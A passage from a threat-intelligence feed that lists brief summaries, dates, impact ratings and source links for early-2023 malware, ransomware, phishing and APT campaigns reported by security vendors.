Summary:: Since last December, Cisco Talos team has has been observing a new actor who used 2 new threats MortalKombat ransomware and a GO variant of the Laplas Clipper malware, to steal cryptocurrency from victims. Also Talos researchers have seen the actor browsing the internet for victim machines with a malicious exposed remote desktop protocol (RDP) port 3389, using one of their download servers that run an RDP crawler and also download MortalKombat ransomware. After the reserachers analyzed something common in the code, class name, and registry key strings, they think that that the MortalKombat ransomware belongs to the Xorist family.

Source: https://blog.talosintelligence.com/new-mortalkombat-ransomware-and-laplas-clipper-malware-threats/

Intel Source:: Welivesecurity

Intel Name:: BlackLotus_Malware_Capable_of_Bypassing_Secure_Boot

Date of Scan:: 2023-03-03

Impact:: MEDIUM

Summary:: Researchers from Welivesecurity have identified that a stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has becomes the first UEFI bootkit malware to bypass secure boot on Windows 11.

Source: https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/

Intel Source:: Proofpoint

Intel Name:: Diving_Deep_into_TA_69_and_its_SocGholish_Payload

Date of Scan:: 2023-03-01

Impact:: LOW

Summary:: Researchers from Proofpoint have observed changes in the tactics, techniques, and procedures (TTPs) employed by TA569. Changes include an increase in the number of injection varieties, as well as payloads deviating from the standard SocGholish “Fake Update” JavaScript packages.

Source: https://www.proofpoint.com/us/blog/threat-insight/ta569-socgholish-and-beyond

Intel Source:: ZScaler

Intel Name:: Snip3_Crypter_is_Back_With_New_TTPs

Date of Scan:: 2023-03-01

Impact:: LOW

Summary:: Researchers from Zscaler have identified the use of the crypter with new TTPs deploying RAT families including DcRAT and QuasarRAT targeting victims across multiple industry verticals such as healthcare, energy and utilities, and manufacturing via spear phishing emails with subject lines related to “tax statements” in order to lure victims into execution.

Source: https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time

Intel Source:: TrendMicro

Intel Name:: Iron_Tiger_Group_Targeting_Linux_Through_SysUpdate

Date of Scan:: 2023-03-01

Impact:: MEDIUM

Summary:: Researchers from TrendMicro have identified that hackers from Iron Tiger updated SysUpdate, one of their custom malware families, to include new features and add malware infection support for the Linux platform.

Source: https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

Intel Source:: Blackberry

Intel Name:: Hackers_From_Blind_Eagle_Targeting_Organizations_in_Colombia_and_Ecuador

Date of Scan:: 2023-03-01

Impact:: LOW

Summary:: BlackBerry researchers have identified a new campaign where the threat actor impersonated a Colombian government tax agency to target key industries in Colombia, including health, financial, law enforcement, immigration, and an agency in charge of peace negotiation in the country.

Source: https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia

Intel Source:: ISC.SANS

Intel Name:: BB17_Distribution_Qakbot_Activity

Date of Scan:: 2023-03-01

Impact:: LOW

Summary:: Researchers from SANS have identified an infection with a URL that is found on VirusTotal after pivoting on a search for BB17-tagged distribution URLs for Qakbot.

Source: https://isc.sans.edu/diary/rss/29592

Intel Source:: Symantec

Intel Name:: Hackers_From_Blackfly_Group_Targeting_Materials_Technology

Date of Scan:: 2023-03-01

Impact:: LOW

Summary:: Symantec researchers have identified the Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, both of which operate in the materials and composites sector, suggesting that the group may be attempting to steal intellectual property.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackfly-espionage-materials

Intel Source:: Inquest

Intel Name:: Threat_Actors_Using_Microsoft_OneNote_for_Malicious_Campaigns

Date of Scan:: 2023-03-01

Impact:: LOW

Summary:: Researchers from Inquest have observed OneNote show that it has been featured in delivery chains for a number of malware threats and distributing multiple groups.

Source: https://inquest.net/blog/2023/02/27/youve-got-malware-rise-threat-actors-using-microsoft-onenote-malicious-campaigns

Intel Source:: Cofense

Intel Name:: Hackers_Abusing_Atlassian

Date of Scan:: 2023-02-28

Impact:: LOW

Summary:: Cofense researchers have observed a phishing campaign, under the guise of a payment remittance, taking advantage of custom URLs from Atlassian to redirect users to their phish.

Source: https://cofense.com/blog/threat-actors-abuse-atlassian-bypass-multiple-secure-email-gateways-segs/

Intel Source:: Cyble

Intel Name:: Analysis_of_FortiNAC_Vulnerability_CVE_2022_39952

Date of Scan:: 2023-02-28

Impact:: LOW

Summary:: Cyble researchers have analyzed the vulnerability affecting multiple versions of FortiNAC. The affected product is widely used in mid to large-size enterprises involving state and private entities.

Source: https://blog.cyble.com/2023/02/27/critical-vulnerability-in-fortinac-cve-2022-39952-exposes-multiple-organizations-to-cyberattacks/

Intel Source:: TrendMicro

Intel Name:: The_Investigation_of_PlugX_Trojan

Date of Scan:: 2023-02-28

Impact:: LOW

Summary:: TrendMicro researchers have discovered a file called x32dbg.exe is used to sideload a malicious DLL they identified as a variant of PlugX.

Source: https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html

Intel Source:: Sonatypa

Intel Name:: PyPI_Malicious_Packages_Dropping_Windows_Trojan_via_Dropbox

Date of Scan:: 2023-02-28

Impact:: LOW

Summary:: Researchers from Sonatype have observed hundreds of packages getting published and removed in batches on the PyPI registry. These packages, despite containing contextual terms like “libs,” “nvidiapaypalsuper,” and so on, are named quite arbitrarily.

Source: https://blog.sonatype.com/attacker-floods-pypi-with-450-malicious-packages-that-drop-windows-trojan-via-dropbox

Intel Source:: ISC.SANS

Intel Name:: URL_Files_and_WebDAV_Using_For_IcedID_Infection

Date of Scan:: 2023-02-28

Impact:: LOW

Summary:: Researchers from SANS have observed that IcedID distribution patterns occasionally change and identified a distribution pattern using .url files and WebDAV traffic for an IcedID infection.

Source: https://isc.sans.edu/diary/URL+files+and+WebDAV+used+for+IcedID+Bokbot+infection/29578/

Intel Source:: ASEC

Intel Name:: Malicious_Emails_Impersonating_Shipping_Companies

Date of Scan:: 2023-02-28

Impact:: LOW

Summary:: Researchers from ASEC have discovered malicious emails impersonating shipping companies being distributed in Korea. These emails prompt users to open the attached file with the subject ‘Submitting import clearance info’.

Source: https://asec.ahnlab.com/en/48304/

Intel Source:: CERT-UA

Intel Name:: Cyber_attacks_on_the_Ukrainian_state_organizations

Date of Scan:: 2023-02-28

Impact:: MEDIUM

Summary:: Researchers from CERT-UA have investigated the violation of the integrity and availability of the web resources of a number of state organizations.

Source: https://cert.gov.ua/article/3947787

Intel Source:: Team Cymru

Intel Name:: Chile_IP_Address_Connecting_to_IcedID_BackConnect_C2_Servers

Date of Scan:: 2023-02-28

Impact:: LOW

Summary:: Researchers from Team-Cymru have identified an IP address geolocation to Chile that is used to access various elements of the IcedID infrastructure.

Source: https://www.team-cymru.com/post/from-chile-with-malware

Intel Source:: ASEC

Intel Name:: Magniber_Ransomware_is_Back_With_New_Technique

Date of Scan:: 2023-02-28

Impact:: LOW

Summary:: ASEC researchers have identified that Magniber ransomware is distributed as a Windows installer package file (.msi) in Edge and Chrome browsers.

Source: https://asec.ahnlab.com/en/48312/

Intel Source:: Cyble

Intel Name:: ChatGPT_Based_Phishing_Attacks

Date of Scan:: 2023-02-28

Impact:: MEDIUM

Summary:: Cyble researchers have detected several phishing websites that are being promoted through a fraudulent OpenAI social media page to spread various types of malware. Furthermore, several phishing sites are impersonating ChatGPT to steal credit card information.

Source: https://blog.cyble.com/2023/02/22/the-growing-threat-of-chatgpt-based-phishing-attacks/

Intel Source:: WeliveSecurity

Intel Name:: Lazarus_Group_Using_New_WinorDLL64_Backdoor

Date of Scan:: 2023-02-27

Impact:: MEDIUM

Summary:: Welivesecurity researchers have observed one of the payloads of the Wslink downloader that was discovered back in 2021. That payload WinorDLL64 based on its filename WinorDLL64.dll. Wslink, which had the filename WinorLoaderDLL64.dll, is a loader for Windows binaries that and runs as a server and executes received modules in memory.

Source: https://www.welivesecurity.com/2023/02/23/winordll64-backdoor-vast-lazarus-arsenal/

Intel Source:: Symantec

Intel Name:: New_Hacking_Group_Clasiopa_Targeting_Materials_Research

Date of Scan:: 2023-02-27

Impact:: MEDIUM

Summary:: Symantec researchers have identified that an unknown threat actor targeting Materials research organizations in Asia with a distinct set of tools.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research

Intel Source:: Bitdefender

Intel Name:: Hackers_Targeting_Multiple_ManageEngine_Products

Date of Scan:: 2023-02-27

Impact:: MEDIUM

Summary:: Researchers from BitDefender have observed that multiple threat actors opportunistically weaponized a now-patched critical security vulnerability impacting several Zoho ManageEngine products since January 20, 2023. Additional Blog link: https://www.bitdefender.com/blog/labs/weaponizing-pocs-a-targeted-attack-using-cve-2022-47966/

Source: https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

Intel Source:: Crowdstrike & Jamf

Intel Name:: I2Pminer_Variant_Targeting_MacOS

Date of Scan:: 2023-02-27

Impact:: LOW

Summary:: CrowdStrike and Jamf researchers have analyzed a macOS-targeted mineware campaign that utilized malicious application bundles to deliver open source XMRig cryptomining software and Invisible Internet Protocol (I2P) network tooling.

Source: https://www.crowdstrike.com/blog/i2pminer-macos-mineware-analysis/ https://www.jamf.com/blog/cryptojacking-macos-malware-discovered-by-jamf-threat-labs/

Intel Source:: Checkmarx

Intel Name:: NPM_Packages_Distributing_Phishing_Links

Date of Scan:: 2023-02-24

Impact:: LOW

Summary:: Checkmarx researchers have investigated and uncovered a recurring attack method, in which cyber attackers utilize spamming techniques to flood the open-source ecosystem with packages that include links to phishing campaigns in their README.md files.

Source: https://checkmarx.com/blog/how-npm-packages-were-used-to-spread-phishing-links/

Intel Source:: Reversing Labs

Intel Name:: PyPI_Packages_Mimicking_Popular_Libraries

Date of Scan:: 2023-02-23

Impact:: LOW

Summary:: Reversing Labs researchers are warning of "imposter packages" mimicking popular libraries available on the Python Package Index (PyPI) repository. The 41 malicious PyPI packages have been found to pose as typosquatted variants of legitimate modules such as HTTP, AIOHTTP, requests, urllib, and urllib3.

Source: https://www.reversinglabs.com/blog/beware-impostor-http-libraries-lurk-on-pypi

Intel Source:: Sentinelone

Intel Name:: The_Investigation_of_8220_Gang_Cloud_Threat

Date of Scan:: 2023-02-23

Impact:: LOW

Summary:: SentinelOne researchers have analyzed the 8220 gang cloud threat as the group has again switched to new infrastructure and samples.

Source: https://www.sentinelone.com/blog/soc-team-essentials-how-to-investigate-and-track-the-8220-gang-cloud-threat/

Intel Source:: Mawarebytes

Intel Name:: Credit_Card_Skimmers_Targeting_Ecommerce_Platforms

Date of Scan:: 2023-02-23

Impact:: LOW

Summary:: Researchers from Malwarebytes have observed credit card skimmers targeting e-commerce platforms such as Magento and WordPress/WooCommerce.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/02/multilingual-skimmer-fingerprints-users-via-cloudflare-endpoint-api

Intel Source:: Sucuri

Intel Name:: Attackers_Leveraging_Cron_Jobs_to_Infect_Websites

Date of Scan:: 2023-02-23

Impact:: LOW

Summary:: Sucuri researchers have observed attackers using malicious corn jobs quite frequently to reinfect websites. Recently, they have seen a distinctive new wave of these infections.

Source: https://blog.sucuri.net/2023/02/attackers-abuse-cron-jobs-to-reinfect-websites.html

Intel Source:: ASEC

Intel Name:: Hackers_Targeting_Innorix_Agent_Vulnerable_Versions

Date of Scan:: 2023-02-23

Impact:: LOW

Summary:: Researchers from ASEC have discovered the distribution of malware targeting users with vulnerable versions of Innorix Agent and the collected malware is a backdoor that attempts to connect to a C&C server.

Source: https://asec.ahnlab.com/en/48198/

Intel Source:: Sekoia

Intel Name:: A_New_InfoStealer_Stealc

Date of Scan:: 2023-02-23

Impact:: LOW

Summary:: Sekoia researchers have identified a new info stealer while routine Dark Web monitoring. The information stealer is advertised as Stealc by its alleged developer, going by the handle Plymouth. Also, the threat actor presents Stealc as a fully featured and ready-to-use stealer, whose development relied on Vidar, Raccoon, Mars, and Redline stealers.

Source: https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/

Intel Source:: ASEC

Intel Name:: Lazarus_Group_Leveraging_Anti_Forensic_Techniques

Date of Scan:: 2023-02-23

Impact:: LOW

Summary:: ASEC researchers have shared the anti-forensic traces and details found in the systems that were infiltrated by the Lazarus group.

Source: https://asec.ahnlab.com/en/48223/

Intel Source:: Varonis

Intel Name:: The_New_Version_of_HardBit_2_0_Ransomware

Date of Scan:: 2023-02-23

Impact:: LOW

Summary:: Researchers from Varonis have identified the new version of HardBit ransomware which is HardBit 2.0 and it is still under development and features unique capabilities.

Source: https://www.varonis.com/blog/hardbit-2.0-ransomware

Intel Source:: Zscaler

Intel Name:: Techniques_Analysis_of_Rhadamanthys_information_stealer

Date of Scan:: 2023-02-23

Impact:: LOW

Summary:: Zscaler researchers have analyzed Rhadamanthys, an information stealer. The malware implements complex anti-analysis techniques by using a public open source library. It is written in C++ and being distributed mostly via malicious Google advertisements. The malware is designed to steal credentials from web browsers, VPN clients, email clients and chat clients as well as cryptocurrency wallets.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-rhadamanthys-obfuscation-techniques

Intel Source:: Securityscorecard

Intel Name:: VMWare_ESXi_Vulnerability_targeted_by_ESXiArgs_Ransomware

Date of Scan:: 2023-02-22

Impact:: MEDIUM

Summary:: After warning of a widespread ransomware campaign exploiting CVE-2021-21974, a VMWare ESXi vulnerability, The SecurityScorecard Threat Research Team started their analyses about this new campaign in response to the advisories and they discovered possible communication between target IP addresses and infrastructure involved in the exploitation of this vulnerability.

Source: https://securityscorecard.com/research/esxiargs-ransomware-campaign-targets-vmware-esxi-vulnerability/

Intel Source:: Symantec

Intel Name:: A_new_threat_group_Hydrochasma_targets_organizations_in_Asia

Date of Scan:: 2023-02-22

Impact:: LOW

Summary:: Researchers from Symantec have observed a new threat group Hydrochasma attacking shipping companies and medical laboratories in Asia. Hydrochasma has not been linked to any previously identified group, but appears to have a possible interest in industries that may be involved in COVID-19-related treatments or vaccines. And possible infection vector used by Hydrochasma was a phishing email.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/hydrochasma-asia-medical-shipping-intelligence-gathering

Intel Source:: TrendMicro

Intel Name:: Expansion_of_attackes_on_Linux_ESXi_Servers_by_Royal_ransomware

Date of Scan:: 2023-02-22

Impact:: MEDIUM

Summary:: TrendMicro analysts analayzed that since last year that ransomware groups will would increasingly target Linux servers and embedded systems in the coming years after detecting a double-digit year-on-year (YoY) increase in attacks on these systems. Royal ransomware is a new variant targeting Linux systems emerged and TrendMicro shared their technical analysis on this variant in their blog.

Source: https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

Intel Source:: SecuronixThreatLabs

Intel Name:: STL_Investigation_222

Date of Scan:: 2023-02-22

Impact:: LOW

Summary:: Indicators of Compromise related to a Securonix Threat Labs investigation

Source: http://www.SecuronixThreatLabs.com

Intel Source:: Cyble

Intel Name:: The_Examination_of_DarkCloud_Stealer

Date of Scan:: 2023-02-22

Impact:: LOW

Summary:: Cyble researchers have observed an increase in the prevalence of DarkCloud Stealer, with Threat Actors employing various spam campaigns to disseminate this malware worldwide.

Source: https://blog.cyble.com/2023/02/20/decoding-the-inner-workings-of-darkcloud-stealer/

Intel Source:: Quickheal

Intel Name:: Raccoon_Stealer_V2_Using_Microsoft_Add_Ins_to_Delivering_Malware

Date of Scan:: 2023-02-22

Impact:: MEDIUM

Summary:: Researchers from QuickHeal have identified that Microsoft Add-Ins can present a potential threat vector for malware like Raccoon Stealer V2. These types of malware are designed to steal sensitive information from infected systems and use Microsoft Add-Ins as a means of delivering the malware to target systems.

Source: https://blogs.quickheal.com/your-office-document-is-at-risk-xll-a-new-attack-vector/

Intel Source:: ASEC

Intel Name:: HWP_Malware_Using_the_Steganography_Technique

Date of Scan:: 2023-02-22

Impact:: LOW

Summary:: ASEC researchers have discovered that the RedEyes threat group is distributing malware by exploiting the HWP EPS (Encapsulated PostScript) vulnerability (CVE-2017-8291).

Source: https://asec.ahnlab.com/en/48063/

Intel Source:: Cyble

Intel Name:: Qakbot_Distributing_via_OneNote

Date of Scan:: 2023-02-22

Impact:: LOW

Summary:: Cyble researchers have identified multiple distribution methods for the widely known banking trojan Qakbot and these methods include using malspam with OneNote attachments, malspam with zip files containing WSF, and others.

Source: https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/

Intel Source:: Esentire

Intel Name:: Analysis_of_Icarus_Stealer

Date of Scan:: 2023-02-22

Impact:: LOW

Summary:: Esentire researchers have analyzed the Icarus stealer malware into the technical details of how the malware operates and security recommendations to protect the organization from being exploited.

Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-icarus-stealer

Intel Source:: ThreatMon

Intel Name:: ReverseRAT_Backdoor_Targeting_Indian_Government_Agencies

Date of Scan:: 2023-02-22

Impact:: MEDIUM

Summary:: Researchers from ThreatMon have observed a spear-phishing campaign targeting Indian government entities that aim to deploy an updated version of a backdoor called ReverseRAT.

Source: https://threatmon.io/apt-sidecopy-targeting-indian-government-entities/

Intel Source:: SocInvestigation

Intel Name:: Return_of_Redline_Stealer

Date of Scan:: 2023-02-22

Impact:: LOW

Summary:: SOC Investigation reserachers discussed in their blog the Redline Stealer malware, the background, its capabilities, and its impact, the basic steps of the malware outlines.

Source: https://www.socinvestigation.com/redline-stealer-returns-with-new-ttps-detection-response/

Intel Source:: Fortinet

Intel Name:: The_Deep_Examination_of_CatB_Ransomware

Date of Scan:: 2023-02-21

Impact:: LOW

Summary:: Fortinet researchers have analyzed the CatB ransomware. It is a reasonably new entrant to the ransomware field, with samples only dating back to December 2022.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-catb-ransomware

Intel Source:: TrendMicro

Intel Name:: Royal_Ransomware_Targeting_Linux_ESXi_Servers

Date of Scan:: 2023-02-21

Impact:: MEDIUM

Summary:: TrendMicro researchers have observed that Royal ransomware expanding its targets by increasingly developing Linux-based versions.

Source: https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

Intel Source:: Malwarebytes

Intel Name:: WordPress_Sites_Backdoored_With_Ad_Fraud_Plugin

Date of Scan:: 2023-02-20

Impact:: LOW

Summary:: Malwarebytes researchers have identified around 50 WordPress blogs that have been backdoored with a plugin called fuser-master.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/02/wordpress-sites-backdoored-with-ad-fraud-plugin

Intel Source:: Eclecticiq

Intel Name:: Hackers_Targeting_Security_Service_of_Ukraine_and_NATO_Allies

Date of Scan:: 2023-02-20

Impact:: LOW

Summary:: EclecticIQ researchers have observed multiple weaponized phishing emails probably targeting the Security Service of Ukraine (SSU), NATO allies like Latvia, and private companies such as Culver Aviation.

Source: https://blog.eclecticiq.com/three-cases-of-cyber-attacks-on-the-security-service-of-ukraine-and-nato-allies-likely-by-russian-state-sponsored-gamaredon

Intel Source:: SecurityScoreCard

Intel Name:: BlackCat_Ransomware_Group_Targeting_Healthcare_Service_Provider

Date of Scan:: 2023-02-20

Impact:: LOW

Summary:: Security ScoreCard researchers have observed BlackCat ransomware group adding an entry for an electronic health record (EHR) vendor to its extortion site.

Source: https://securityscorecard.com/research/blackcat-ransomware-group-claims-attack-on-healthcare-service-provider/

Intel Source:: Sucuri

Intel Name:: The_Dangers_of_Installing_Nulled_WordPress_Themes_and_Plugins

Date of Scan:: 2023-02-20

Impact:: LOW

Summary:: Researchers from Sucuri have identified installing nulled themes or plugins on the website is not only participating in software theft but can also introduce serious risks including malware, SEO spam, and website backdoors.

Source: https://blog.sucuri.net/2023/02/the-dangers-of-installing-nulled-wordpress-themes-and-plugins.html

Intel Source:: Sentilone

Intel Name:: A_new_threat_cluster_WIP26

Date of Scan:: 2023-02-19

Impact:: MEDIUM

Summary:: SentinelLabs has observed a threat activity tracked as WIP26. This threat actor has been targeting telecommunication companies in the Middle East. WIP26 is known by abusing of public Cloud infrastructure – Microsoft 365 Mail, Microsoft Azure, Google Firebase, and Dropbox – for malware delivery, data exfiltration, and C2 purposes.

Source: https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/

Intel Source:: Blackberry

Intel Name:: DarkBit_Ransomware_Targeting_Israel

Date of Scan:: 2023-02-18

Impact:: MEDIUM

Summary:: BlackBerry researchers have identified a new ransomware strain dubbed "DarkBit" that has recently appeared on the threat landscape after targeting one of Israel's top research universities, Technion - Israel Institute of Technology (IIT).

Source: https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel

Intel Source:: Yoroi

Intel Name:: From_Targeting_Attacks_to_widespread_Usage_of_Brute_Ratel

Date of Scan:: 2023-02-18

Impact:: LOW

Summary:: Researchers from Yoroi have identified and tracked security threats that involve actively searching for and analyzing potential security breaches or anomalies in an organization's systems and networks.

Source: https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/?&web_view=true

Intel Source:: TrendMicro

Intel Name:: Earth_Kitsune_Delivering_New_WhiskerSpy_Backdoor

Date of Scan:: 2023-02-18

Impact:: LOW

Summary:: TrendMicro researchers have discovered a new backdoor which they have attributed to the APT group known as Earth Kitsune. Since 2019, Earth Kitsune has been distributing variants of self-developed backdoors to targets, primarily individuals who are interested in North Korea.

Source: https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html

Intel Source:: ASEC

Intel Name:: Analysis_of_distribution_sites_of_Magniber_ransomware_using_EDR

Date of Scan:: 2023-02-18

Impact:: LOW

Summary:: ASEC researchers have identified that Magniber ransomware distribution is continued and tracking the distribution site URL through a different method.

Source: https://asec.ahnlab.com/en/47909/

Intel Source:: Lookout

Intel Name:: Dark_Caracal_APT_Back_with_New_Version_of_Bandook_Spyware

Date of Scan:: 2023-02-17

Impact:: MEDIUM

Summary:: Researchers from Lookout have discovered that the Dark Caracal APT is currently using a new version of Bandook spyware to target Windows systems.

Source: https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

Intel Source:: PaloAlto

Intel Name:: Mirai_Variant_V3G4_Targeting_IoT_Devices

Date of Scan:: 2023-02-17

Impact:: LOW

Summary:: Researchers from PaloAlto have observed a Mirai variant called V3G4, is leveraging several vulnerabilities to spread itself. Once the vulnerable devices are compromised, they will be fully controlled by attackers and become a part of the botnet.

Source: https://unit42.paloaltonetworks.com/mirai-variant-v3g4/

Intel Source:: ASEC

Intel Name:: Hackers_From_RedEyes_Using_New_Malware_to_Steal_Data

Date of Scan:: 2023-02-17

Impact:: LOW

Summary:: ASEC researchers have identified that the APT37 threat group using a new evasive 'M2RAT' malware and steganography to target individuals for intelligence collection.

Source: https://asec.ahnlab.com/ko/47622/

Intel Source:: Trellix

Intel Name:: ESXiArgs_Ransomware_Leveraging_Two_Year_Old_Vulnerability

Date of Scan:: 2023-02-17

Impact:: LOW

Summary:: Trellix researchers have identified that Global ESXiArgs ransomware is attacking the back of a two-year-old vulnerability. The vulnerability ransomware actors targeted is CVE-2021-21974 and allows an attacker to exploit the OpenSLP protocol if the affected server is exposed to the internet.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/global-esxiargs-ransomware-attack-on-the-back-of-a-two-year-old-vulnerability.html

Intel Source:: TrendMicro

Intel Name:: Earth_Yako_Group_is_Back

Date of Scan:: 2023-02-17

Impact:: LOW

Summary:: Researchers from TrendMicro have investigated several incidents and observed the intrusion set introduced new tools and malware within a short period of time, frequently changing and expanding its attack targets. Security researchers believe that Earth Yako is still active and will keep targeting more organizations soon.

Source: https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html

Intel Source:: Symantec

Intel Name:: New_Malware_Abusing_Microsoft_IIS_Feature_to_Establish_Backdoor

Date of Scan:: 2023-02-17

Impact:: MEDIUM

Summary:: Researchers from Symantec have observed a new malware that abuses a feature of Microsoft’s Internet Information Services (IIS) to deploy a backdoor onto targeted systems.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/frebniis-malware-iis

Intel Source:: Morphisec

Intel Name:: Malware_Campaign_Delivering_ProxyShellMiner_to_Windows_Endpoints

Date of Scan:: 2023-02-17

Impact:: MEDIUM

Summary:: Morphisec researchers have identified a highly evasive malware campaign delivering ProxyShellMiner to Windows endpoints. ProxyShellMiner exploits the ProxyShell vulnerabilities CVE-2021-34473 and CVE-2021-34523 in Windows Exchange servers for initial access and compromise of an organization to deliver crypto miners.

Source: https://blog.morphisec.com/proxyshellminer-campaign

Intel Source:: Welivesecurity

Intel Name:: Trojanized_Installers_Targeting_Southeast_and_East_Asia

Date of Scan:: 2023-02-17

Impact:: LOW

Summary:: ESET researchers have identified a campaign using trojanized installers to deliver the FatalRAT malware, distributing via malicious websites linked in ads that appear in Google search results.

Source: https://www.welivesecurity.com/2023/02/16/these-arent-apps-youre-looking-for-fake-installers/

Intel Source:: Sentinelone

Intel Name:: The_Analysis_of_TZW_Ransomware

Date of Scan:: 2023-02-17

Impact:: LOW

Summary:: SentinelOne researchers have deeply analyzed the TZW ransomware. Also, observed TZW ransomware linked to a known malware family called GlobeImposter (sometimes referred to as LOLNEK or LOLKEK).

Source: https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/

Intel Source:: DOCGuard

Intel Name:: Microsoft_OneNote_Sample_Targeting_Cisco_VPN

Date of Scan:: 2023-02-16

Impact:: LOW

Summary:: Researchers from DOCGuard have identified that the Microsoft OneNote sample targeting Cisco VPN users bypasses all the antiviruses.

Source: https://twitter.com/doc_guard/status/1625872935595507713

Intel Source:: SecurityScoreCard

Intel Name:: US_Public_Housing_Authority_ransomware_attack

Date of Scan:: 2023-02-16

Impact:: LOW

Summary:: U.S. Public Housing Authority has announced a disruption, but has not elaborated on the nature of the event. The LockBit ransomware group, which has made false claims in the past, took responsibility for the incident.

Source: https://securityscorecard.com/research/ransomware-attack-against-u-s-public-housing-authority-linked-to-previous-attacks/

Intel Source:: ASEC

Intel Name:: Malware_Targeting_Security_Related_Workers

Date of Scan:: 2023-02-16

Impact:: LOW

Summary:: ASEC researchers have discovered that the malware is distributed to broadcasting and ordinary companies as well as those in the security-related field.

Source: https://asec.ahnlab.com/en/47585/

Intel Source:: ASEC

Intel Name:: LockBit_2_0_Ransomware_is_Back

Date of Scan:: 2023-02-16

Impact:: MEDIUM

Summary:: ASEC researchers have identified that Lockbit 2.0 is being distributed in a MalPE format instead of the NSIS format.

Source: https://asec.ahnlab.com/en/47739/

Intel Source:: ASEC

Intel Name:: Paradise_Ransomware_Distributing_Through_AweSun_Vulnerability_Exploitation

Date of Scan:: 2023-02-16

Impact:: LOW

Summary:: ASEC researchers have discovered the distribution of Paradise ransomware and the threat actors are suspected to be utilizing vulnerability exploitation of the Chinese remote control program AweSun.

Source: https://asec.ahnlab.com/en/47590/

Intel Source:: Cyble

Intel Name:: Diving_Deep_into_DarkBit_Ransomware

Date of Scan:: 2023-02-16

Impact:: LOW

Summary:: Cyble researchers have recently detected a sample of the DarkBit ransomware and analyzed its details.

Source: https://blog.cyble.com/2023/02/15/uncovering-the-dark-side-of-darkbit-ransomware/

Intel Source:: ZScaler

Intel Name:: A_new_Havoc_campaign_targeting_a_Government_organization

Date of Scan:: 2023-02-16

Impact:: LOW

Summary:: Zscaler ThreatLabz research team observed a new campaign called Havoc which is targeting a Government organization.The threat actors have been using a new Command & Control (C2) framework named Havoc. The team provoded the technical analysis and overview of recently discovered attack campaign targeting government organization using Havoc and reveals how it can be leveraged by the threat actors in various campaigns.

Source: https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace

Intel Source:: Rewterz

Intel Name:: Active_IOCs_of_Tofsee_Malware

Date of Scan:: 2023-02-15

Impact:: LOW

Summary:: Researchers from Rewterz have identified the active IOCs of Tofsee Malware. It has been around since 2016. Once installed on a compromised computer, it can be used to send spam emails and gather user data.

Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alerts-tofsee-malware-active-iocs

Intel Source:: Minerva Labs

Intel Name:: New_Malware_That_Can_Fly_Under_the_Radar

Date of Scan:: 2023-02-15

Impact:: LOW

Summary:: Researchers from Minerva Labs have identified a new piece of evasive malware dubbed Beep that's designed to fly under the radar and drop additional payloads onto a compromised host.

Source: https://minerva-labs.com/blog/beepin-out-of-the-sandbox-analyzing-a-new-extremely-evasive-malware/

Intel Source:: ASEC

Intel Name:: Qakbot_Malware_Distributing_via_OneNote

Date of Scan:: 2023-02-15

Impact:: LOW

Summary:: Researchers from ASEC have identified that Qakbot stopped using MS Office Macro, their past distribution method, and instead started to use OneNote to execute their malware.

Source: https://asec.ahnlab.com/en/47785/

Intel Source:: ASEC

Intel Name:: Pybot_DDoS_Distributing_With_Illegal_Software

Date of Scan:: 2023-02-15

Impact:: LOW

Summary:: ASEC researchers have monitoring malware that is being distributed through illegal software like software cracks or serial keygens and recently discovered Pybot DDoS being distributed with illegal software.

Source: https://asec.ahnlab.com/en/47789/

Intel Source:: BitDefender

Intel Name:: A_Deep_Investigation_of_VMware_ESXi_Servers_Vulnerability

Date of Scan:: 2023-02-15

Impact:: LOW

Summary:: BitDefender researchers have investigated the VMware ESXi servers vulnerability which was targeted by Opportunistic Threat Actors and advised users to patch it immediately.

Source: https://businessinsights.bitdefender.com/technical-advisory-immediately-patch-your-vmware-esxi-servers-targeted-by-opportunistic-threat-actors

Intel Source:: Cyble

Intel Name:: Turkish_Earthquake_Leads_to_Fake_Donation_Schemes

Date of Scan:: 2023-02-15

Impact:: MEDIUM

Summary:: Researchers from Cyble have discovered various domains and IP addresses hosting websites that claim to be collecting funds to aid those affected by the earthquake in Turkey and Syria.

